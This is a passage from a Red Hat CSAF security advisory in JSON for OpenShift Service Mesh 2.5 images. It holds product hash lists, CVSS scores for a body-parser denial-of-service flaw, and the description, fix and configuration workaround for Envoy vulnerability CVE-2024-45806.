"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "body-parser: Denial of Service Vulnerability in body-parser"
},
{
"acknowledgments": [
{
"names": [
"Mike Whale"
]
},
{
"names": [
"James Force"
],
"organization": "Red Hat",
"summary": "This issue was discovered by Red Hat."
}
],
"cve": "CVE-2024-45806",
"cwe": {
"id": "CWE-639",
"name": "Authorization Bypass Through User-Controlled Key"
},
"discovery_date": "2024-09-20T00:40:20.976812+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2313683"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in Envoy that allows external clients to manipulate Envoy headers, potentially leading to unauthorized access or other malicious actions within the mesh. This issue arises due to Envoy\u0027s default configuration of internal trust boundaries, which considers all RFC1918 private address ranges as internal. The default behavior for handling internal addresses in Envoy has been changed. Previously, RFC1918 IP addresses were automatically considered internal, even if the internal_address_config was empty. The default configuration of Envoy will continue to trust internal addresses while in this release and it will not trust them by default in next release. If you have tooling such as probes on your private network which need to be treated as trusted such as changing arbitrary x-envoy headers, please explicitly include those addresses or CIDR ranges into `internal_address_config`. Successful exploitation could allow attackers to bypass security controls, access sensitive data, or disrupt services within the mesh, like Istio.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: Potential to manipulate `x-envoy` headers from external sources",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat\u0027s CVSS score and impact are specific to our product and may not match those of upstream. This is due to how envoy is configured and used within our OpenShift Service Mesh product.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45806"
},
{
"category": "external",
"summary": "RHBZ#2313683",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313683"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45806",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45806"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45806",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45806"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-ffhv-fvxq-r6mf",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-ffhv-fvxq-r6mf"
}
],
"release_date": "2024-09-20T00:15:02.293000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
},
{
"category": "workaround",
"details": "This flaw can be mitigated by configuring envoy to treat all IPs as external. This is done by setting the internal_address_config range for envoy to `0.0.0.0/32`.",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
